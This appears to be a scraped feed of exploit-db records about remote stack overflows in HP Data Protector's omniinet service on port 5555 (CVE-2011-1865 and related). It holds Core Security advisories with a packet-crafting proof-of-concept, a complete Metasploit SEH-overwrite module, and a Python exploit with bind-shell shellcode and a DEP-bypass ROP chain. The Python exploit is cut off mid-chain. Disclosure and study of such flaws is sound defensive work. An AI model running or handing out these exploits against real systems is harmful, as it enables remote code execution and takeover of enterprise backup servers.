85D2 TEST EDX,EDX\r\n0041D182 |. 74 73 JE SHORT omniinet.0041D1F7\r\n[...]\r\n0041D1F7 |> 8B45 0C /MOV EAX,DWORD PTR SS:[EBP+C]\r\n0041D1FA |. 0FB708 |MOVZX ECX,WORD PTR DS:[EAX]\r\n0041D1FD |. 85C9 |TEST ECX,ECX\r\n0041D1FF |. 74 26 |JE SHORT omniinet.0041D227\r\n0041D201 |. 8B55 08 |MOV EDX,DWORD PTR SS:[EBP+8]\r\n0041D204 |. 8955 FC |MOV DWORD PTR SS:[EBP-4],EDX\r\n0041D207 |. 8B45 08 |MOV EAX,DWORD PTR SS:[EBP+8]\r\n0041D20A |. 8B4D 0C |MOV ECX,DWORD PTR SS:[EBP+C]\r\n0041D20D |. 66:8B11 |MOV DX,WORD PTR DS:[ECX]\r\n0041D210 |. 66:8910 |MOV WORD PTR DS:[EAX],DX // copy WORDs\r\nto the stack\r\n0041D213 |. 8B45 08 |MOV EAX,DWORD PTR SS:[EBP+8]\r\n0041D216 |. 83C0 02 |ADD EAX,2\r\n0041D219 |. 8945 08 |MOV DWORD PTR SS:[EBP+8],EAX\r\n0041D21C |. 8B4D 0C |MOV ECX,DWORD PTR SS:[EBP+C]\r\n0041D21F |. 83C1 02 |ADD ECX,2\r\n0041D222 |. 894D 0C |MOV DWORD PTR SS:[EBP+C],ECX\r\n0041D225 |.^EB D0 \\JMP SHORT omniinet.0041D1F7\r\n0041D227 |> 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8]\r\n0041D22A |. 66:C702 0000 MOV WORD PTR DS:[EDX],0\r\n0041D22F |. 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]\r\n0041D232 |. 8BE5 MOV ESP,EBP\r\n0041D234 |. 5D POP EBP\r\n0041D235 \\. C3 RETN\r\n \r\n- -----/\r\n\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n. 2011-06-06:\r\nCore Security Technologies notifies the HP team of the vulnerabilities\r\nand provides the technical details. Publication date is temporarily set\r\nto July 5th, 2011.\r\n\r\n. 2011-06-06:\r\nVendor confirms that a new case was assigned within HP Software Security\r\nResponse Team (SSRT).\r\n\r\n. 2011-06-16:\r\nCore requests an update on this issue, in particular Core asks the\r\nvendor for a technical analysis of the bugs, a list of affected products\r\nand versions, and the vendor's plan for providing a fix (no reply\r\nreceived).\r\n\r\n. 2011-06-23:\r\nCore requests once more an update.\r\n\r\n. 2011-06-28:\r\nVendor communicates that a security bulletin will be issued on the same\r\nday (June 28). The vendor confirms the vulnerabilities, and recommends\r\nas mitigation to enable encrypted communications in the cell server and\r\nclient.\r\n\r\n. 2011-06-28:\r\nCore requests a link to the vendor's bulletin, and asks whether CVE ids\r\nhave been assigned.\r\n\r\n. 2011-06-28:\r\nVendor provides a link to the bulletin and CVE names for the\r\nvulnerabilities.\r\n\r\n. 2011-06-29:\r\nAdvisory CORE-2011-0606 is published.\r\n\r\n\r\n\r\n10. *References*\r\n\r\n[1] HP Data Protector http://hp.com/go/dataprotector\r\n[2] HPSBMU02686 SSRT100541 rev.2 - HP OpenView Storage Data Protector,\r\nRemote Execution of Arbitrary Code\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182\r\n\r\n\r\n11. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://corelabs.coresecurity.com.\r\n\r\n\r\n12. *About Core Security Technologies*\r\n\r\nCore Security Technologies enables organizations to get ahead of threats\r\nwith security test and measurement solutions that continuously identify\r\nand demonstrate real-world exposures to their most critical assets. Our\r\ncustomers can gain real visibility into their security standing, real\r\nvalidation of their security controls, and real metrics to more\r\neffectively secure their organizations.\r\n\r\nCore Security's software solutions build on over a decade of trusted\r\nresearch and leading-edge threat expertise from the company's Security\r\nConsulting Services, CoreLabs and Engineering groups. Core Security\r\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n13. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2011 Core Security\r\nTechnologies and (c) 2011 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n\r\n\r\n14. *PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (MingW32)\r\n\r\niEYEARECAAYFAk4LnZsACgkQyNibggitWa07/ACfSlzkBvbowAskeP/K4FqtxCay\r\nEAkAnRCPKdc35t5Cb0ZJbGy4me4JRALo\r\n=zHon\r\n-----END PGP SIGNATURE-----\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/17461/"}, {"lastseen": "2016-02-02T07:54:16", "description": "HP Data Protector 6.20 - Multiple Vulnerabilities. CVE-2011-1865. Dos exploit for windows platform", "published": "2011-06-29T00:00:00", "type": "exploitdb", "title": "HP Data Protector 6.20 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1865"], "modified": "2011-06-29T00:00:00", "id": "EDB-ID:17458", "href": "https://www.exploit-db.com/exploits/17458/", "sourceData": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n Core Security Technologies - Corelabs Advisory\r\n http://corelabs.coresecurity.com/\r\n\r\n Multiple vulnerabilities in HP Data Protector\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: Multiple vulnerabilities in HP Data Protector\r\nAdvisory ID: CORE-2011-0514\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities\r\nDate published: 2011-06-29\r\nDate of last update: 2011-06-29\r\nVendors contacted: HP\r\nRelease mode: Coordinated release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Remote stack overflow [CWE-120], Null pointer dereference\r\n[CWE-476], Improper input validation [CWE-20]\r\nImpact: Code execution\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2011-1865, CVE-2011-1514, CVE-2011-1515\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nHP Data Protector [1] is an automated backup and recovery software for\r\nsingle-server to enterprise environments. Multiple vulnerabilities have\r\nbeen found in HP Data Protector that could allow a remote attacker to\r\nexecute arbitrary code and lead to denial of service conditions. The\r\nvulnerabilities are triggered by sending a request to port 5555 of a\r\nhost running the \"data protector inet\" service, part of HP Data\r\nProtector. The request has several parameters, including an opcode. By\r\nsending requests with specially crafted parameters, the different bugs\r\ncan be triggered.\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . HP OpenView Storage Data Protector v6.20 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.11 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.10 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.00 (running on Windows).\r\n . Previous versions may be affected, but were not tested.\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . No fixes are available at the time of publication.\r\n\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nHP has issued a security bulletin with document ID c02872182 [2]\r\navailable through HP Support Center at http://www.hp.com/go/HPSC.\r\n\r\nThe latest version of HP Data Protector is vulnerable to these issues.\r\nHP has provided the following procedure to mitigate these vulnerabilities:\r\n\r\n 1. Upgrade to Data Protector A.06.20 or subsequent.\r\n 2. Enable encrypted control communication services on cell server and\r\nall clients in cell.\r\n\r\n The upgrade is available for download from\r\nhttp://hp.com/go/dataprotector then under 'Product Information' click on\r\n'Trials and Demos'.\r\n\r\n\r\n7. *Credits*\r\n\r\nThese vulnerabilities were discovered by Oren Isacson from Core Security\r\nTechnologies. Publication was coordinated by Carlos Sarraute.\r\n\r\n\r\n8. *Technical Description / Proof of Concept Code*\r\n\r\nThe following python script can be used to reproduce the different bugs.\r\n\r\n/-----\r\nimport struct, socket, sys\r\n\r\ntarget = sys.argv[1]\r\nopcode = sys.argv[2]\r\nstring_lenght = int(sys.argv[3])\r\nargs_number = int(sys.argv[4])\r\nlong_argument = int(sys.argv[5])\r\n\r\ndef to_wc(x):\r\n return ''.join([\"%s\\x00\" % c for c in x] )\r\n\r\nargs = [to_wc('a')] * args_number\r\nargs[5] = to_wc(opcode)\r\nargs[long_argument] = 'a' * string_lenght\r\npacket = [\"\\xff\\xfe\\x32\\x00\\x00\\x00\"]\r\n\r\nfor s in args:\r\n packet.append(\"\\x20\\x00\" + s + \"\\x00\\x00\")\r\n\r\npacket = ''.join(packet)\r\npacket = struct.pack(\">L\", len(packet)) + packet\r\n\r\nsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\nsock.connect((target, 5555))\r\nsock.send(packet)\r\n\r\n- -----/\r\n\r\n\r\nIn the following sections, we give the command line details to reproduce\r\neach bug, and a brief description of the effect produced.\r\n\r\n\r\n8.1. *Vulnerability 1. Opcodes 20 y 28.*\r\n\r\n[CVE-2011-1865] This vulnerability can be reproduced with any of the\r\nfollowing commands:\r\n \"poc.py 127.0.0.1 20 10000 30 13\" or \"poc.py 127.0.0.1 28 10000 30 6\"\r\n This causes a stack overflow.\r\n\r\n/-----\r\n007ce194 00426c52 007d0000 00810b48 007ce266 omniinet+0x26bf3\r\n007ce1a8 00412a35 007ce22c 004aa900 0080edb0 omniinet+0x26c52\r\n007cea3c 61616161 61616161 61616161 61616161 omniinet+0x12a35\r\n61616161 00000000 00000000 00000000 00000000 0x61616161\r\n\r\n- -----/\r\n\r\n\r\n\r\n8.2. *Vulnerability 2. Opcode 11.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n \"poc.py 127.0.0.1 11 10000 30 17\"\r\n A stack overflow is produced within the function swprintf, called from\r\nposition 0x00411A72.\r\n\r\n\r\n8.3. *Vulnerability 3. Opcode 35.*\r\n\r\n[CVE-2011-1865] This vulnerability can be reproduced with any of the\r\nfollowing commands:\r\n \"poc.py 127.0.0.1 35 10000 30 6\" or \"poc.py 127.0.0.1 35 10000 30 7\"\r\n A stack overflow is produced within the function swprintf, called from\r\nposition 0041367F.\r\n\r\n\r\n8.4. *Vulnerability 4. Opcode 42.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n \"poc.py 127.0.0.1 42 10000 30 9\"\r\n A stack overflow is produced by calling the function swprintf from\r\nposition 0x0040A9BA.\r\n\r\n\r\n8.5. *Vulnerability 5. Opcode 46.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n \"poc.py 127.0.0.1 46 10000 30 17\"\r\n A stack overflow is produced by calling the function swprintf from\r\nposition 0x0040A708.\r\n\r\n\r\n8.6. *Vulnerability 6. Opcode 27.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n \"poc.py 127.0.0.1 27 10000 30 3\"\r\n A stack overflow is produced by calling the function swprintf from\r\nposition 0x0040AD53.\r\n\r\n\r\n8.7. *Vulnerabilidad 7. Opcode 17.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n \"poc.py 127.0.0.1 17 10000 30 6\"\r\n A stack overflow is produced by calling the function swprintf from\r\nposition 0x0040FC05.\r\n\r\n\r\n8.8. *Vulnerability 8. Opcode 11.*\r\n\r\n[CVE-2011-1514] This vulnerability is reproduced with the following command:\r\n \"poc.py 127.0.0.1 11 1 7 6\"\r\n This causes a null pointer dereference.\r\n\r\n/-----\r\neax=00000014 ebx=00156490 ecx=007cdd34 edx=007eecf0 esi=00156490\r\nedi=00000000\r\neip=00407ed0 esp=007cdd34 ebp=007cdd8c iopl=0 nv up ei pl nz ac\r\npe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000\r\nefl=00010212\r\nomniinet+0x7ed0:\r\n00407ed0 8b10 mov edx,[eax]\r\nds:0023:00000014=????????\r\n\r\n\r\n007cdd8c 0041143e 00000000 00000000 00156490 omniinet+0x7ed0\r\n007cea3c 0040892b 00000001 0046b9f0 00000000 omniinet+0x1143e\r\n007cf4b8 00408f02 00000000 00000000 00156490 omniinet+0x892b\r\n007cf518 0040a42c 00000000 7ad5f7f9 00000000 omniinet+0x8f02\r\n007cffa0 77df352b 00000001 00156498 0012e7f8 omniinet+0xa42c\r\n007cffb4 7c80b713 00156490 00000000 0012e7f8\r\nADVAPI32!CryptVerifySignatureW+0x29\r\n007cffec 00000000 77df3519 00156490 00000000\r\nkernel32!GetModuleFileNameA+0x1b4\r\n\r\n- -----/\r\n\r\n\r\n8.9. *Vulnerability 9. Opcode 20.*\r\n\r\n[CVE-2011-1515] This vulnerability is reproduced with the following command:\r\n \"poc.py 127.0.0.1 20 1 7 6\"\r\n The process terminates without generating an exception, resulting in a\r\ndenial of service condition.\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n. 2011-06-02:\r\nCore Security Technologies notifies HP Security Alert team of the\r\nvulnerabilities. Publication date is temporarily set to July 5th, 2011.\r\n\r\n. 2011-06-06:\r\nVendor acknowledges receipt.\r\n\r\n. 2011-06-06:\r\nCore sends technical details to the vendor.\r\n\r\n. 2011-06-06:\r\nVendor confirms that a new case was assigned within HP Software Security\r\nResponse Team (SSRT).\r\n\r\n. 2011-06-16:\r\nCore requests an update on this issue, in particular Core asks the\r\nvendor for a technical analysis of the bugs, a list of affected products\r\nand versions, and the vendor's plan for providing a fix (no reply\r\nreceived).\r\n\r\n. 2011-06-23:\r\nCore requests once more an update.\r\n\r\n. 2011-06-28:\r\nVendor communicates that a security bulletin will be issued on the same\r\nday (June 28). The vendor confirms the vulnerabilities, and recommends\r\nas mitigation to enable encrypted communications in the cell server and\r\nclient.\r\n\r\n. 2011-06-28:\r\nCore requests a link to the vendor's bulletin, and asks whether CVE ids\r\nhave been assigned.\r\n\r\n. 2011-06-28:\r\nVendor provides a link to the bulletin and CVE names for the\r\nvulnerabilities.\r\n\r\n. 2011-06-29:\r\nAdvisory CORE-2011-0514 is published.\r\n\r\n\r\n10. *References*\r\n\r\n[1] HP Data Protector http://hp.com/go/dataprotector\r\n[2] HPSBMU02686 SSRT100541 rev.2 - HP OpenView Storage Data Protector,\r\nRemote Execution of Arbitrary Code\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182\r\n\r\n\r\n11. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://corelabs.coresecurity.com.\r\n\r\n\r\n12. *About Core Security Technologies*\r\n\r\nCore Security Technologies enables organizations to get ahead of threats\r\nwith security test and measurement solutions that continuously identify\r\nand demonstrate real-world exposures to their most critical assets. Our\r\ncustomers can gain real visibility into their security standing, real\r\nvalidation of their security controls, and real metrics to more\r\neffectively secure their organizations.\r\n\r\nCore Security's software solutions build on over a decade of trusted\r\nresearch and leading-edge threat expertise from the company's Security\r\nConsulting Services, CoreLabs and Engineering groups. Core Security\r\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n13. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2011 Core Security\r\nTechnologies and (c) 2011 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n\r\n\r\n14. *PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (MingW32)\r\n\r\niEUEARECAAYFAk4LmqsACgkQyNibggitWa02bgCYyTgE3BmdxGGAOY4dNZqmekvo\r\nCwCfTapBtDaQT/LBrrVC7K4l8G5hnEo=\r\n=ozGY\r\n-----END PGP SIGNATURE-----\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/17458/"}, {"lastseen": "2016-02-02T07:55:30", "description": "HP OmniInet.exe Opcode 27 Buffer Overflow. CVE-2011-1865. Remote exploit for windows platform", "published": "2011-07-01T00:00:00", "type": "exploitdb", "title": "HP OmniInet.exe - Opcode 27 Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1865"], "modified": "2011-07-01T00:00:00", "id": "EDB-ID:17467", "href": "https://www.exploit-db.com/exploits/17467/", "sourceData": "##\r\n# $Id: hp_omniinet_3.rb 13081 2011-07-01 22:26:12Z sinn3r $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'HP OmniInet.exe Opcode 27 Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a buffer overflow in the Hewlett-Packard\r\n\t\t\t\tOmniInet NT Service. By sending a specially crafted opcode 27 packet,\r\n\t\t\t\ta remote attacker may be able to execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 13081 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2011-1865' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'seh',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 800,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'StackAdjustment' => -3500\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'HP Data Protector A.06.10 Build 611 / A.06.11 Build 243',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t#POP/POP/RET from OmniBack\\bin\\MSVCR71.dll\r\n\t\t\t\t\t\t\t'Ret' => 0x7c35630d\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Jun 29 2011'))\r\n\r\n\t\tregister_options([Opt::RPORT(5555)], self.class)\r\n\tend\r\n\r\n\tdef check\r\n\r\n\t\tconnect\r\n\t\tsock.put(rand_text_alpha_upper(64))\r\n\t\tresp = sock.get_once(-1,5)\r\n\t\tdisconnect\r\n\r\n\t\tif (resp)\r\n\t\t\tresp = resp.unpack('v*').pack('C*')\r\n\t\t\tprint_status(\"Received response: \" + resp)\r\n\r\n\t\t\t# extract version\r\n\t\t\tif (resp =~ /HP Data Protector/)\r\n\t\t\t\tversion = resp.split[3]\r\n\t\t\telsif (resp =~ /HP OpenView Storage Data Protector/)\r\n\t\t\t\tversion = resp.split[5]\r\n\t\t\telsif (resp =~ /HP StorageWorks Application Recovery Manager/)\r\n\t\t\t\tversion = resp.split[5]\r\n\t\t\telse\r\n\t\t\t\treturn Exploit::CheckCode::Detected\r\n\t\t\tend\r\n\r\n\t\t\tversion = version.split('.')\r\n\t\t\tmajor = version[1].to_i\r\n\t\t\tminor = version[2].to_i\r\n\t\t\tif ((major < 6) or (major == 6 and minor < 11))\r\n\t\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\t\tend\r\n\r\n\t\t\tif ((major > 6) or (major == 6 and minor >= 11))\r\n\t\t\t\treturn Exploit::CheckCode::Safe\r\n\t\t\tend\r\n\r\n\t\tend\r\n\t\treturn Exploit::CheckCode::Safe\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tconnect\r\n\r\n\t\ttrigger = rand_text_alpha_upper(10000)\r\n\t\ttrigger[4552, payload.encoded.length] = payload.encoded\r\n\t\ttrigger[5352, 8] = generate_seh_record(target.ret) \r\n\t\ttrigger[5360, 5] = Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-788\").encode_string\r\n\r\n\t\topcode = \"27\"\r\n\r\n\t\tpacket = Rex::Text.to_unicode(\"\\x00\")\r\n\t\tpacket << \"\\x27\\xca\" #length\r\n\t\tpacket << \"\\xff\\xfe\\x32\"\r\n\t\tpacket << \"\\x00\\x00\\x00\"\r\n\t\tpacket << Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 3\r\n\t\tpacket << Rex::Text.to_unicode(\"\\x20\")\r\n\t\tpacket << trigger\r\n\t\tpacket << Rex::Text.to_unicode(\"\\x00\")\r\n\t\tpacket << Rex::Text.to_unicode(\"\\x20\\x61\\x00\")\r\n\t\tpacket << Rex::Text.to_unicode(\"\\x20\" + opcode + \"\\x00\")\r\n\t\tpacket << Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 24 \r\n\r\n\t\tprint_status(\"Trying #{target.name}...\")\r\n\t\tsock.put(packet)\r\n\t\t\r\n\t\tselect(nil,nil,nil,10)\r\n\t\thandler\r\n\t\tdisconnect\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/17467/"}, {"lastseen": "2016-02-02T07:55:38", "description": "HP Data Protector 6.11 Remote Buffer Overflow DEP ROP. CVE-2011-1865. Remote exploit for windows platform", "published": "2011-07-02T00:00:00", "type": "exploitdb", "title": "HP Data Protector 6.11 - Remote Buffer Overflow + DEP Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1865"], "modified": "2011-07-02T00:00:00", "id": "EDB-ID:17468", "href": "https://www.exploit-db.com/exploits/17468/", "sourceData": "#!/usr/bin/python\r\n# HP Data Protector 6.11 Remote Buffer Overflow\r\n# Tested on Windows 2003 R2 + DEP Enabled\r\n# Authors: muts & dookie\r\n# Reference: http://www.exploit-db.com/exploits/17458/\r\n# Reference: http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities\r\n# http://www.offensive-security.com/0day/hp-dataprotector.py.txt\r\n\r\nimport struct, socket, sys\r\ntarget = sys.argv[1]\r\n\r\n# bindshell - port 4444\r\nshellcode = (\"\\xbf\\x83\\x75\\x7f\\xdd\\xdb\\xc8\\xd9\\x74\\x24\\xf4\\x5e\\x33\\xc9\\xb1\"\r\n\"\\x56\\x31\\x7e\\x13\\x03\\x7e\\x13\\x83\\xee\\x7f\\x97\\x8a\\x21\\x97\\xd1\"\r\n\"\\x75\\xda\\x67\\x82\\xfc\\x3f\\x56\\x90\\x9b\\x34\\xca\\x24\\xef\\x19\\xe6\"\r\n\"\\xcf\\xbd\\x89\\x7d\\xbd\\x69\\xbd\\x36\\x08\\x4c\\xf0\\xc7\\xbc\\x50\\x5e\"\r\n\"\\x0b\\xde\\x2c\\x9d\\x5f\\x00\\x0c\\x6e\\x92\\x41\\x49\\x93\\x5c\\x13\\x02\"\r\n\"\\xdf\\xce\\x84\\x27\\x9d\\xd2\\xa5\\xe7\\xa9\\x6a\\xde\\x82\\x6e\\x1e\\x54\"\r\n\"\\x8c\\xbe\\x8e\\xe3\\xc6\\x26\\xa5\\xac\\xf6\\x57\\x6a\\xaf\\xcb\\x1e\\x07\"\r\n\"\\x04\\xbf\\xa0\\xc1\\x54\\x40\\x93\\x2d\\x3a\\x7f\\x1b\\xa0\\x42\\x47\\x9c\"\r\n\"\\x5a\\x31\\xb3\\xde\\xe7\\x42\\x00\\x9c\\x33\\xc6\\x95\\x06\\xb0\\x70\\x7e\"\r\n\"\\xb6\\x15\\xe6\\xf5\\xb4\\xd2\\x6c\\x51\\xd9\\xe5\\xa1\\xe9\\xe5\\x6e\\x44\"\r\n\"\\x3e\\x6c\\x34\\x63\\x9a\\x34\\xef\\x0a\\xbb\\x90\\x5e\\x32\\xdb\\x7d\\x3f\"\r\n\"\\x96\\x97\\x6c\\x54\\xa0\\xf5\\xf8\\x99\\x9f\\x05\\xf9\\xb5\\xa8\\x76\\xcb\"\r\n\"\\x1a\\x03\\x11\\x67\\xd3\\x8d\\xe6\\x88\\xce\\x6a\\x78\\x77\\xf0\\x8a\\x50\"\r\n\"\\xbc\\xa4\\xda\\xca\\x15\\xc4\\xb0\\x0a\\x99\\x11\\x16\\x5b\\x35\\xc9\\xd7\"\r\n\"\\x0b\\xf5\\xb9\\xbf\\x41\\xfa\\xe6\\xa0\\x69\\xd0\\x91\\xe6\\xa7\\x00\\xf2\"\r\n\"\\x80\\xc5\\xb6\\xe5\\x0c\\x43\\x50\\x6f\\xbd\\x05\\xca\\x07\\x7f\\x72\\xc3\"\r\n\"\\xb0\\x80\\x50\\x7f\\x69\\x17\\xec\\x69\\xad\\x18\\xed\\xbf\\x9e\\xb5\\x45\"\r\n\"\\x28\\x54\\xd6\\x51\\x49\\x6b\\xf3\\xf1\\x00\\x54\\x94\\x88\\x7c\\x17\\x04\"\r\n\"\\x8c\\x54\\xcf\\xa5\\x1f\\x33\\x0f\\xa3\\x03\\xec\\x58\\xe4\\xf2\\xe5\\x0c\"\r\n\"\\x18\\xac\\x5f\\x32\\xe1\\x28\\xa7\\xf6\\x3e\\x89\\x26\\xf7\\xb3\\xb5\\x0c\"\r\n\"\\xe7\\x0d\\x35\\x09\\x53\\xc2\\x60\\xc7\\x0d\\xa4\\xda\\xa9\\xe7\\x7e\\xb0\"\r\n\"\\x63\\x6f\\x06\\xfa\\xb3\\xe9\\x07\\xd7\\x45\\x15\\xb9\\x8e\\x13\\x2a\\x76\"\r\n\"\\x47\\x94\\x53\\x6a\\xf7\\x5b\\x8e\\x2e\\x07\\x16\\x92\\x07\\x80\\xff\\x47\"\r\n\"\\x1a\\xcd\\xff\\xb2\\x59\\xe8\\x83\\x36\\x22\\x0f\\x9b\\x33\\x27\\x4b\\x1b\"\r\n\"\\xa8\\x55\\xc4\\xce\\xce\\xca\\xe5\\xda\")\r\n\r\nwpm = \"\\x55\\x23\\xe4\\x77\" # 77E42355 WriteProcessMemory - Win2k3 \r\nwpm += \"\\x50\\xd0\\x4b\\x00\" # 004bd050 omniinet.exe - Return after WPM \r\nwpm += \"\\xff\\xff\\xff\\xff\" # hProcess \r\nwpm += \"\\x50\\xd0\\x4b\\x00\" # 004bd050 omniinet.exe - Address to Patch \r\nwpm += \"\\x41\\x41\\x41\\x41\" # lpBuffer placeholder (Shellcode Address) \r\nwpm += \"\\x42\\x42\\x42\\x42\" # nSize placeholder (Shellcode Size) 00001000\r\nwpm += \"\\x38\\xd4\\x4b\\x00\" # 004BD438 omniinet.exe - Pointer for Written Bytes \r\n\r\n# pre\r\npacket = (\"\\x00\\x00\\x27\\xCA\\xFF\\xFE\\x32\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\"\r\n\"\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\"\r\n\"\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x32\\x00\\x30\\x00\\x00\\x00\"\r\n\"\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\"\r\n\"\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\"\r\n\"\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\")\r\n\r\n# padding to EIP\r\npacket +=\"A\"* 2004\r\n# Get a copy of ESP into a register for safekeeping\r\npacket +=\"\\x1f\\x59\\x37\\x7c\" # 0x7c37591f PUSH ESP # ADD EAX,DWORD PTR DS:[EAX] # ADD CH,BL # INC EBP # OR AL,59 # POP ECX # POP EBP # RETN\r\npacket += \"\\x44\" * 4 # junk to pop into EBP\r\n\r\n# Jump over the WPM parameters\r\npacket += \"\\xfe\\x9b\\x35\\x7c\" # 0x7c359bfe : # ADD ESP,20 # RETN \r\npacket += wpm\r\npacket += \"\\x44\" * 4 # filler\r\n\r\n# Get EAX to 